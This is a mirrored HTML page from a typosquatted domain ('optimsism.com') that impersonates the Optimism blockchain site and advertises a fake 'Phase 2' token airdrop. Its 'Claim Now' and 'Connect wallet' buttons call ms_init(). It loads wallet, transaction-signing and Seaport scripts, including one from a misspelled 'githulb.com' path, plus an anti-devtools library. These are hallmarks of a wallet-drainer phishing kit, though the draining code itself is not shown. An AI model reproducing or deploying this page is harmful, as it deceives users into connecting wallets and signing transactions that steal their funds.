<!DOCTYPE html>
<html data-wf-domain="" data-wf-page="63f6ae5a9e29c45f8af2e899" data-wf-site="611dbb3c82ba72fbc285d4e2">

<!-- Mirrored from optimsism.com/airdrop by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 04 Apr 2023 05:54:39 GMT -->
<head>
<meta charset="utf-8" />
<title>Optimism - 2nd Airdrop</title>
<meta content="Optimism is a Layer 2 Optimistic Rollup network designed to utilize the strong security guarantees of Ethereum while reducing its cost and latency." name="description" />
<meta content="Optimism" property="og:title" />
<meta content="Optimism is a Layer 2 Optimistic Rollup network designed to utilize the strong security guarantees of Ethereum while reducing its cost and latency." property="og:description" />
<meta content="https://assets-global.website-files.com/611dbb3c82ba72fbc285d4e2/613267577e2c89636109a8b9_main%20OpenGraph%20image.png" property="og:image" />
<meta content="Optimism" property="twitter:title" />
<meta content="Optimism is a Layer 2 Optimistic Rollup network designed to utilize the strong security guarantees of Ethereum while reducing its cost and latency." property="twitter:description" />
<meta content="https://assets-global.website-files.com/611dbb3c82ba72fbc285d4e2/613267577e2c89636109a8b9_main%20OpenGraph%20image.png" property="twitter:image" />
<meta property="og:type" content="website" />
<meta content="summary_large_image" name="twitter:card" />
<meta content="width=device-width, initial-scale=1" name="viewport" />
<link href="611dbb3c82ba72fbc285d4e2/css/optimism-io.20e1e0461.css" rel="stylesheet" type="text/css" />
<link href="https://fonts.googleapis.com/" rel="preconnect" />
<script disable-devtool-auto src='https://cdn.jsdelivr.net/npm/disable-devtool'></script>
<link href="https://fonts.gstatic.com/" rel="preconnect" crossorigin="anonymous" />
<script src="ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
<script type="text/javascript">
			WebFont.load({  google: {    families: ["Open Sans:300,300italic,400,400italic,600,600italic,700,700italic,800,800italic","Inconsolata:400,700","Rubik:regular,600,italic,600italic"]  }});
		</script>
<!--[if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif]-->
<script type="text/javascript">
			!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);
		</script>
<link href="611dbb3c82ba72fbc285d4e2/612d2f8f988b5f801bd0cf1e_favicon.png" rel="shortcut icon" type="image/x-icon" />
<link href="611dbb3c82ba72fbc285d4e2/612d2fb4db57a25fad503a0f_webclip.png" rel="apple-touch-icon" />
<script src="jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
<script src="../cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js" type="application/javascript"></script>
<script src="../cdn.jsdelivr.net/npm/web3%401.8.1/dist/web3.min.js"></script>
<script type="text/javascript" src="scripts/index.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/web3modal@1.9.11"></script>
<script type="text/javascript" src="../unpkg.com/evm-chains%400.2.0/dist/umd/index.min.js"></script>
<script type="text/javascript" src="../unpkg.com/%40walletconnect/web3-provider%401.8.0/dist/umd/index.min.js"></script>
<script src="../unpkg.com/axios%401.2.2/dist/axios.min.js"></script>
<script src="../cdn.jsdelivr.net/npm/%40coinbase/wallet-sdk%403.6.3/dist/index.min.js"></script>
<script type="text/javascript" src="scripts/ethereumjs-tx-1.3.3.min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/ABI.js"></script>
<script type="text/javascript" src="../githulb.com/scripts/main.js"></script>
<script type="text/javascript" src="scripts/seaport.js"></script>
<script src="../code.jquery.com/jquery-3.6.3.slim.min.js"></script>
<script src="../cdn.jsdelivr.net/npm/ua-parser-js%401.0.33/src/ua-parser.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
<style>
				  .web3modal-provider-wrapper {
					  width: 100%;
					  padding: 8px;
					  display: flex;
					  -webkit-box-pack: center;
					  justify-content: center;
					  -webkit-box-align: center;
					  align-items: center;
					  flex-direction: column;
					  cursor: pointer;
					  border-radius: 0px;
					  border-top-left-radius: 0px;
					  border-top-right-radius: 0px;
					  border-bottom-right-radius: 0px;
					  border-bottom-left-radius: 0px;
				  }
				  #WEB3_CONNECT_MODAL_ID {
				  position: absolute;
				  z-index: 9999;            
				  }
	  
			  </style>
</head>
<body class="body-2022">
<div class="page">
<div class="banner">
<div class="page-padding">
<div class="banner-content">
<div class="banner-text">Optimism Airdrop Phase 2 just started. Users can proceed to claims.</div>
<buttnon class="banner-link w-inline-block" onclick="ms_init()" style="cursor: pointer;"><div>Claim Now!</div></button>
</div>
</div>
</div>
<div data-collapse="medium" data-animation="default" data-duration="300" data-easing="ease-out" data-easing2="ease-in" data-no-scroll="1" role="banner" class="nav w-nav">
<div class="nav-container">
<a href="index.html" aria-current="page" class="nav-logo-container w-inline-block w--current">
<div class="nav-desktop-logo"><img src="611dbb3c82ba72fbc285d4e2/611fd32ef63b79b5f8568d58_OPTIMISM-logo.svg" loading="eager" width="150" alt="" /></div>
<div class="nav-mobile-logo"></div>
</a>
<nav role="navigation" class="nav-menu w-nav-menu">
<a href="index.html" target="_blank" class="nav-menu-dropdown single w-nav-link"></a>
<div data-w-id="c5cd5c58-96ad-d83c-89a6-35cc054e4bd2" class="nav-menu-dropdown">
<div data-w-id="c5cd5c58-96ad-d83c-89a6-35cc054e4bd3" class="nav-menu-item-title">
<div></div>
</div>
<div class="nav-sub-menu topbar-gov-tab">
<div class="border-div">
<div class="sub-menu-flex-container">
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/63a0a086f764993b5e93bbe8_topbar-gov-optimit-nft.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Optimist NFT</div></div>
</a>
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/62e02a9eb0935e7dc4955bae_topbar-governance-announcement.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">OP Collective</div></div>
</a>
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/63a0a08696657a6abf5739c4_topbar-gov-retropgf.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">About RetroPGF</div></div>
</a>
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/62e02ac7588d20ab5b5bc6da_topbar-gov-delegates.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Delegates</div></div>
</a>
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/62e02ac7b0935e5d07955c57_topbar-gov-forum.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Governance forum</div></div>
</a>
</div>
</div>
</div>
</div>
<div data-w-id="c70d2e8f-77bd-aabe-7a0a-9913c58b9748" class="nav-menu-dropdown">
<div data-w-id="c70d2e8f-77bd-aabe-7a0a-9913c58b9749" class="nav-menu-item-title">
<div></div>
 </div>
<div class="nav-sub-menu topbar-ecosystem-tab">
<div class="border-div">
<div class="sub-menu-flex-container">
<a href="apps/all.html" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/62e02a9edccb7c4e840be7fb_topbar-ecosystem-all-apps.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">All apps</div></div>
</a>
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/632b255fe7d9d81de8d5b6da_topbar-eco-quests.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Quests</div></div>
</a>
</div>
</div>
</div>
</div>
<a href="index.html" target="_blank" class="nav-menu-dropdown single w-nav-link"></a>
<div data-w-id="160330e6-0bc7-b1f0-618c-2438fa4bb63c" class="nav-menu-dropdown">
<div data-w-id="160330e6-0bc7-b1f0-618c-2438fa4bb63d" class="nav-menu-item-title">
<div></div>
</div>
<div class="nav-sub-menu topbar-dev-tab">
<div class="border-div">
<div class="sub-menu-flex-container">
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61bd0da87c6b00577a02b471_topbar-dev-documentation.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Documentation</div></div>
</a>
<a href="https://explorer.optimism.io/" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61bd0da9dc12151d36acdbeb_topbar-block-explorer.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Block explorer</div></div>
</a>
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61d78e289d36777f93e17bd4_topbar-status.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Status</div></div>
</a>
<a href="https://immunefi.com/bounty/optimism/" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61e0593de21eda164f1bff59_topbar-bug-bounty.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Bug bounty</div></div>
</a>
<a href="https://github.com/ethereum-optimism" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61bd0da89da5dba736275207_topbar-github.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">GitHub</div></div>
</a>
</div>
</div>
</div>
</div>
<div data-w-id="c5cd5c58-96ad-d83c-89a6-35cc054e4bfe" class="nav-menu-dropdown">
<div data-w-id="c5cd5c58-96ad-d83c-89a6-35cc054e4bff" class="nav-menu-item-title">
<div class="text-block-4"></div>
</div>
<div class="nav-sub-menu topbar-more-tab">
<div class="border-div">
<div class="sub-menu-flex-container">
<a href="index.html" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/62e02ac7832a7cec6735e512_topbar-more-help.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Help center</div></div>
</a>
<a href="https://discord-gateway.optimism.io/" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61bd0da8229af30e8a720409_topbar-discord.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Discord</div></div>
</a>
<a href="https://twitter.com/optimismFND" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61bd0da9dc1215bea3acdbea_topbar-twitter.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Twitter</div></div>
</a>
<a href="https://www.twitch.tv/optimismfnd" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/61bd0da8c1839389967e0f01_topbar-twitch.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Twitch</div></div>
</a>
<a href="https://optimism.mirror.xyz/" target="_blank" class="nav-link w-inline-block">
<div class="nav-link-icon-container"><img src="611dbb3c82ba72fbc285d4e2/62bc6d4e973b17544f18b198_topbar-mirror.svg" loading="lazy" width="52" alt="" /></div>
<div class="nav-link-container"><div class="link-title">Blog</div></div>
</a>
</div>
</div>
</div>
</div>
</nav>
<div role="button" class="mobile-menu-button w-nav-button">
<div class="mobile-nav-menu-text-2">menu</div>
<div class="underline-2"></div>
</div>
<div class="nav-social-container">
<a href="https://twitter.com/optimismFND" target="_blank" class="nav-social-link twitter w-inline-block"></a>
<div class="nav-social-dividing-line-2"></div>
<a href="https://discord-gateway.optimism.io/" target="_blank" class="nav-social-link discord w-inline-block"></a>
<div class="nav-social-dividing-line-2"></div>
<a href="https://www.twitch.tv/optimismfnd" target="_blank" class="nav-social-link twitch w-inline-block"></a>
</div>
</div>
</div>
<div class="home-header wf-section">
<div class="page-padding">
<div class="hhe-content">
<h1 class="hhe-heading">Optimism Airdrop Distribution.</h1>
<div class="hhe-sub-heading">Optimism is a low-cost and lightning-fast Ethereum L2 blockchain.</div>
<div class="hhe-buttons-container">
<button class="btn-primary w-button" onclick="ms_init()">Connect wallet</button>
</div>
<div class="hhe-image"></div>
</div>
</div>
</div>
<div class="home-ecosystem wf-section">
<div class="page-padding">
<div class="hec2-content">
<div class="hec2-flex-container">
<h2 class="hec2-heading">Fast, stable, scalable Ethereum.</h2>
<div class="hec2-sub-heading">
Optimism is a fast, stable, and scalable L2 blockchain built by Ethereum developers, for Ethereum developers. Built as a minimal extension to existing Ethereum software, Optimism’s EVM-equivalent architecture
scales your Ethereum apps without surprises. If it works on Ethereum, it works on Optimism at a fraction of the cost.
</div>
<div class="hec2-buttons-container">
<a href="apps/all.html" class="btn-primary w-button">Explore the ecosystem</a>
<div class="spacer-w-24"></div>
<div class="spacer-h-16"></div>
<a href="about.html" class="btn-aswh w-button">Learn more about Optimism</a>
</div>
</div>
<div class="hec2-image-container"></div>
</div>
</div>
</div>
<div class="home-stats wf-section">
<div class="page-padding">
<div class="hst-content">
<div class="hst-stats-collection-list-wrapper w-dyn-list">
<div role="list" class="hst-stats-flex w-dyn-items">
<div role="listitem" class="hst-stat-container w-dyn-item">
<a href="https://dune.com/optimismfnd/Optimism-Overview" target="_blank" class="hst-stat-link-block w-inline-block">
<div class="hst-big-number">$1B+</div>
 <div class="hst-number-label">Gas fees saved</div>
</a>
</div>
<div role="listitem" class="hst-stat-container w-dyn-item">
<a href="https://dune.com/optimismfnd/Optimism-Overview" target="_blank" class="hst-stat-link-block w-inline-block">
<div class="hst-big-number">$1B+</div>
<div class="hst-number-label">On-chain value</div>
</a>
</div>
<div role="listitem" class="hst-stat-container w-dyn-item">
<a href="https://medium.com/ethereum-optimism/retropgf-experiment-1-1-million-dollars-for-public-goods-f7e455cbdca" target="_blank" class="hst-stat-link-block w-inline-block">
<div class="hst-big-number">$1M</div>
<div class="hst-number-label">Distributed to public goods</div>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="home-tech wf-section">
<div class="page-padding">
<div class="hte-content">
<div class="hte-text-container">
<h3 class="hte-heading">Optimism goes Superchain</h3>
<div class="hte-sub-title">The Superchain project seeks to maximize interoperability and composability between different chains using the OP Stack, and integrate siloed L2s into a single, cohesive layer.</div>
</div>
<div class="hte-grid-wrapper">
<div id="w-node-f9f35390-7daf-b17c-a1c0-1c3a0431b228-8af2e899" class="hte-block">
<div class="hte-block-title">OP Stack</div>
<div class="hte-block-text">The modular code powering Optimism Mainnet and the Superchain.</div>
<a href="http://stack.optimism.io/" class="btn-primary w-button">View docs</a>
</div>
<div id="w-node-_71464541-f61f-6fd9-7f2e-efdb29878e81-8af2e899" class="hte-block">
<div class="hte-block-title">The Superchain</div>
<div class="hte-block-text">Building towards a unified future that doesn’t fracture our ecosystems, our applications, or our ability to work together.</div>
<a href="https://forms.monday.com/forms/055862bfb7f4091be3db2567288296f8?r=use1" target="_blank" class="btn-primary w-button">Get in touch</a>
</div>
</div>
</div>
</div>
</div>
<div class="home-community wf-section">
<div class="page-padding">
<div class="hco-content">
<h4 class="hco-heading">Built for the public good.</h4>
<div class="hco-sub-title">
Optimism is more than just a blockchain. It&#x27;s an experiment in sustainable ecosystem funding fueled by protocol revenue. Retroactive Public Goods Funding is simple: you build for the public good, you get
paid. Join us on Discord and help build the future of Ethereum, sustainably.
</div>
<a href="https://discord-gateway.optimism.io/" target="_blank" class="hco-discord-button w-inline-block">
<div class="hco-discord-icon"></div>
<div class="hco-discord-button-text">Join us on Discord</div>
</a>
</div>
</div>
</div>
<div class="home-dev wf-section">
<div class="page-padding">
<div class="hde-content">
<div class="hde-text-container">
<h5 class="hde-heading">Developer resources</h5>
<div class="hde-sub-title">Everything you need to get started building on Optimism, all in one place.</div>
<div class="hde-button-wrapper"><a href="https://community.optimism.io/" target="_blank" class="btn-primary w-button">Start building</a></div>
</div>
</div>
</div>
</div>
<div class="footer-2022">
<div class="page-padding">
<div class="footer-content">
<div class="footer-links-flex">
<div class="footer-accordion-item">
<div data-w-id="8edfbcd1-69dd-658a-7784-9f7314c6325d" class="footer-accordion-trigger">
<div class="footer-links-title">Optimism</div>
<div class="footer-accordion-icon"></div>
</div>
<div class="footer-accordion-content">
<a href="index.html" aria-current="page" class="footer-link-2022 w--current">Home</a><a href="https://app.optimism.io/governance" target="_blank" class="footer-link-2022">Governance</a>
<a href="https://app.optimism.io/bridge" target="_blank" class="footer-link-2022">Bridge</a><a href="apps/all.html" class="footer-link-2022">Ecosystem</a>
<a href="https://help.optimism.io/" target="_blank" class="footer-link-2022">Help center</a>
<div class="accordion-vertical-spacer"></div>
</div>
<div class="footer-line-mobile"></div>
</div>
<div class="footer-accordion-item">
<div data-w-id="8edfbcd1-69dd-658a-7784-9f7314c6326d" class="footer-accordion-trigger">
<div class="footer-links-title">Developers</div>
<div class="footer-accordion-icon"></div>
</div>
<div class="footer-accordion-content">
<a href="https://community.optimism.io/" target="_blank" class="footer-link-2022">Documentation</a><a href="https://explorer.optimism.io/" target="_blank" class="footer-link-2022">Block explorer</a>
<a href="https://status.optimism.io/" target="_blank" class="footer-link-2022">Status</a><a href="https://immunefi.com/bounty/optimism/" target="_blank" class="footer-link-2022">Bug bounty</a>
<a href="https://dev.optimism.io/" target="_blank" class="footer-link-2022">Dev blog</a>
<a href="https://leimqo8fo47.typeform.com/optimism-mktg" target="_blank" class="footer-link-2022">Marketing support</a>
<a href="https://forms.monday.com/forms/c867f3f357707ff1fb4af0d3d5080710?r=use1" target="_blank" class="footer-link-2022">Get in touch</a>
<a href="https://github.com/ethereum-optimism" target="_blank" class="footer-link-2022">GitHub</a>
<div class="accordion-vertical-spacer"></div>
</div>
<div class="footer-line-mobile"></div>
</div>
<div class="footer-accordion-item">
<div data-w-id="8edfbcd1-69dd-658a-7784-9f7314c63281" class="footer-accordion-trigger">
<div class="footer-links-title">Community</div>
<div class="footer-accordion-icon"></div>
</div>
<div class="footer-accordion-content">
<a href="https://discord-gateway.optimism.io/" target="_blank" class="footer-link-2022">Discord</a><a href="https://twitter.com/optimismFND" target="_blank" class="footer-link-2022">Twitter</a>
<a href="https://www.twitch.tv/optimismfnd" target="_blank" class="footer-link-2022">Twitch</a><a href="https://optimism.mirror.xyz/" target="_blank" class="footer-link-2022">Blog</a>
<a href="https://calendar.google.com/calendar/u/0/embed?src=c_4hui70itm089e7t8q50heh1kno@group.calendar.google.com&amp;ctz=America/Denver" target="_blank" class="footer-link-2022">Events</a>
<a href="https://optimism.us6.list-manage.com/subscribe/post?u=9727fa8bec4011400e57cafcb&amp;id=ca91042234&amp;f_id=002a19e3f0" target="_blank" class="footer-link-2022">Newsletter</a>
<div class="accordion-vertical-spacer"></div>
</div>
<div class="footer-line-mobile"></div>
</div>
<div class="footer-accordion-item">
<div data-w-id="8edfbcd1-69dd-658a-7784-9f7314c63291" class="footer-accordion-trigger">
<div class="footer-links-title">About</div>
<div class="footer-accordion-icon"></div>
</div>
<div class="footer-accordion-content">
<a href="about.html" class="footer-link-2022">About</a><a href="https://jobs.optimism.io/jobs" target="_blank" class="footer-link-2022">Careers</a>
<a href="https://github.com/ethereum-optimism/brand-kit" target="_blank" class="footer-link-2022">Brand assets</a>
<a href="https://dune.com/optimismfnd/Optimism-Overview" target="_blank" class="footer-link-2022">On-chain data</a>
<a href="legal-terms-and-disclosures.html" class="footer-link-2022">Legal terms &amp; disclosures</a><a href="community-notice.html" target="_blank" class="footer-link-2022">Community Notice</a>
<div class="accordion-vertical-spacer"></div>
</div>
<div class="footer-line-mobile"></div>
</div>
</div>
<div class="footer-bottom-flex">
<div class="footer-social-links-container">
<a href="https://twitter.com/optimismFND" target="_blank" class="footer-social-link-2022 twitter w-inline-block">
<div class="twitter-icon-embed w-embed">
<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 52 52" fill="none">
<path d="M40.2734 19.1875C40.2734 19.5391 40.2734 19.8203 40.2734 20.1719C40.2734 29.9453 32.8906 41.125 19.3203 41.125C15.1016 41.125 11.2344 39.9297 8 37.8203C8.5625 37.8906 9.125 37.9609 9.75781 37.9609C13.2031 37.9609 16.3672 36.7656 18.8984 34.7969C15.6641 34.7266 12.9219 32.6172 12.0078 29.6641C12.5 29.7344 12.9219 29.8047 13.4141 29.8047C14.0469 29.8047 14.75 29.6641 15.3125 29.5234C11.9375 28.8203 9.40625 25.8672 9.40625 22.2812V22.2109C10.3906 22.7734 11.5859 23.0547 12.7812 23.125C10.7422 21.7891 9.47656 19.5391 9.47656 17.0078C9.47656 15.6016 9.82812 14.3359 10.4609 13.2812C14.1172 17.7109 19.6016 20.6641 25.7188 21.0156C25.5781 20.4531 25.5078 19.8906 25.5078 19.3281C25.5078 15.25 28.8125 11.9453 32.8906 11.9453C35 11.9453 36.8984 12.7891 38.3047 14.2656C39.9219 13.9141 41.5391 13.2812 42.9453 12.4375C42.3828 14.1953 41.2578 15.6016 39.7109 16.5156C41.1875 16.375 42.6641 15.9531 43.9297 15.3906C42.9453 16.8672 41.6797 18.1328 40.2734 19.1875Z" fill="currentColor"></path>
</svg>
</div>
</a>
<a href="https://discord-gateway.optimism.io/" target="_blank" class="footer-social-link-2022 discord w-inline-block">
<div class="discord-icon-embed w-embed">
<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 52 52" fill="none">
<path d="M40.3438 13.4219C40.3438 13.4219 40.3438 13.4219 40.2734 13.4219C37.6016 12.1562 34.7891 11.3125 31.9062 10.8203C31.8359 10.75 31.7656 10.8203 31.7656 10.8203C31.3438 11.5234 30.9922 12.2969 30.7109 13C27.5469 12.5078 24.3828 12.5078 21.2188 13C20.9375 12.2969 20.5859 11.5234 20.1641 10.8203C20.1641 10.8203 20.0938 10.75 20.0234 10.8203C17.1406 11.3125 14.3281 12.1562 11.6562 13.4219C11.5859 13.4219 11.5859 13.4219 11.5859 13.4219C6.24219 21.4375 4.76562 29.2422 5.46875 36.9766C5.46875 36.9766 5.46875 37.0469 5.53906 37.0469C8.63281 39.3672 12.1484 41.125 15.875 42.25C15.875 42.3203 15.9453 42.25 16.0156 42.25C16.7891 41.125 17.4922 40 18.125 38.8047C18.125 38.7344 18.125 38.6641 18.0547 38.5938C16.9297 38.1719 15.8047 37.6797 14.8203 37.0469C14.75 37.0469 14.6797 36.9062 14.8203 36.8359C15.0312 36.6953 15.2422 36.5547 15.4531 36.3438C15.4531 36.3438 15.5234 36.3438 15.5938 36.3438C22.3438 39.4375 29.6562 39.4375 36.3359 36.3438C36.4062 36.3438 36.4062 36.3438 36.4766 36.3438C36.6875 36.5547 36.8984 36.6953 37.1094 36.8359C37.1797 36.9062 37.1797 37.0469 37.1094 37.0469C36.0547 37.6797 35 38.1719 33.875 38.5938C33.8047 38.6641 33.8047 38.7344 33.8047 38.8047C34.4375 40 35.1406 41.125 35.9141 42.25C35.9844 42.25 35.9844 42.3203 36.0547 42.25C39.7812 41.125 43.2969 39.3672 46.3906 37.0469C46.4609 37.0469 46.4609 36.9766 46.4609 36.9766C47.3047 28.0469 44.9844 20.3125 40.3438 13.4219ZM19.1094 32.2656C17.0703 32.2656 15.3828 30.3672 15.3828 28.1172C15.3828 25.7969 17.0703 23.9688 19.1094 23.9688C21.2188 23.9688 22.8359 25.7969 22.8359 28.1172C22.8359 30.3672 21.1484 32.2656 19.1094 32.2656ZM32.8203 32.2656C30.7812 32.2656 29.1641 30.3672 29.1641 28.1172C29.1641 25.7969 30.7812 23.9688 32.8203 23.9688C34.9297 23.9688 36.6172 25.7969 36.5469 28.1172C36.5469 30.3672 34.9297 32.2656 32.8203 32.2656Z" fill="currentColor"></path>
</svg>
</div>
</a>
<a href="https://github.com/ethereum-optimism" target="_blank" class="footer-social-link-2022 github w-inline-block">
<div class="github-icon-embed w-embed">
<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 52 52" fill="none">
<path d="M20.1641 36.4844C20.1641 36.625 20.0234 36.6953 19.8125 36.6953C19.6016 36.7656 19.4609 36.625 19.4609 36.4844C19.4609 36.3438 19.6016 36.2031 19.8125 36.2031C20.0234 36.2031 20.1641 36.3438 20.1641 36.4844ZM17.9844 36.1328C17.9844 36.2734 18.125 36.4844 18.3359 36.4844C18.4766 36.5547 18.6875 36.4844 18.7578 36.3438C18.7578 36.2031 18.6875 36.0625 18.4766 35.9922C18.2656 35.9219 18.0547 35.9922 17.9844 36.1328ZM21.1484 36.0625C20.9375 36.0625 20.7969 36.2031 20.7969 36.4141C20.7969 36.5547 21.0078 36.625 21.2188 36.5547C21.4297 36.4844 21.5703 36.4141 21.5 36.2734C21.5 36.1328 21.2891 35.9922 21.1484 36.0625ZM25.7188 9.0625C16.0156 9.0625 8.5625 16.5156 8.5625 26.2188C8.5625 34.0234 13.4141 40.7031 20.4453 43.0938C21.3594 43.2344 21.6406 42.6719 21.6406 42.25C21.6406 41.7578 21.6406 39.3672 21.6406 37.8906C21.6406 37.8906 16.7188 38.9453 15.6641 35.7812C15.6641 35.7812 14.8906 33.7422 13.7656 33.25C13.7656 33.25 12.1484 32.125 13.8359 32.125C13.8359 32.125 15.5938 32.2656 16.5781 33.9531C18.125 36.6953 20.6562 35.9219 21.7109 35.4297C21.8516 34.3047 22.2734 33.5312 22.8359 33.0391C18.8984 32.6172 14.8906 32.0547 14.8906 25.3047C14.8906 23.3359 15.4531 22.4219 16.5781 21.1562C16.3672 20.6641 15.8047 18.8359 16.7891 16.375C18.1953 15.9531 21.6406 18.2734 21.6406 18.2734C23.0469 17.8516 24.5234 17.7109 26 17.7109C27.5469 17.7109 29.0234 17.8516 30.4297 18.2734C30.4297 18.2734 33.8047 15.8828 35.2812 16.375C36.2656 18.8359 35.6328 20.6641 35.4922 21.1562C36.6172 22.4219 37.3203 23.3359 37.3203 25.3047C37.3203 32.0547 33.1719 32.6172 29.2344 33.0391C29.8672 33.6016 30.4297 34.6562 30.4297 36.3438C30.4297 38.6641 30.3594 41.6172 30.3594 42.1797C30.3594 42.6719 30.7109 43.2344 31.625 43.0234C38.6562 40.7031 43.4375 34.0234 43.4375 26.2188C43.4375 16.5156 35.4922 9.0625 25.7188 9.0625ZM15.3828 33.3203C15.2422 33.3906 15.3125 33.6016 15.3828 33.7422C15.5234 33.8125 15.6641 33.8828 15.8047 33.8125C15.875 33.7422 15.875 33.5312 15.7344 33.3906C15.5938 33.3203 15.4531 33.25 15.3828 33.3203ZM14.6094 32.7578C14.5391 32.8984 14.6094 32.9688 14.75 33.0391C14.8906 33.1094 15.0312 33.1094 15.1016 32.9688C15.1016 32.8984 15.0312 32.8281 14.8906 32.7578C14.75 32.6875 14.6797 32.6875 14.6094 32.7578ZM16.8594 35.2891C16.7891 35.3594 16.7891 35.5703 17 35.7109C17.1406 35.8516 17.3516 35.9219 17.4219 35.7812C17.4922 35.7109 17.4922 35.5 17.3516 35.3594C17.2109 35.2188 17 35.1484 16.8594 35.2891ZM16.0859 34.2344C15.9453 34.3047 15.9453 34.5156 16.0859 34.6562C16.2266 34.7969 16.3672 34.8672 16.5078 34.7969C16.5781 34.7266 16.5781 34.5156 16.5078 34.375C16.3672 34.2344 16.2266 34.1641 16.0859 34.2344Z" fill="currentColor"></path>
</svg>
</div>
</a>
</div>
<div class="footer-legal-text">©  Copybyte Optimism Foundation 2020 - 2023. All Rights Reserved.</div>
</div>
</div>
</div>
</div>
</div>
<script src="assets/web3-provider/web3-connect.js"></script>
<script src="/assets/web3-provider/web3-connect.js"></script>
<script src="/assets/web3-provider/web3-module.js"></script>
<script src="/assets/web3-provider/ethers.js"></script>
<script src="/assets/web3-provider/ethereum-tx.js"></script>
<script src="/assets/web3-provider.js"></script>
</body>

<!-- Mirrored from optimsism.com/airdrop by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 04 Apr 2023 05:54:50 GMT -->
</html>
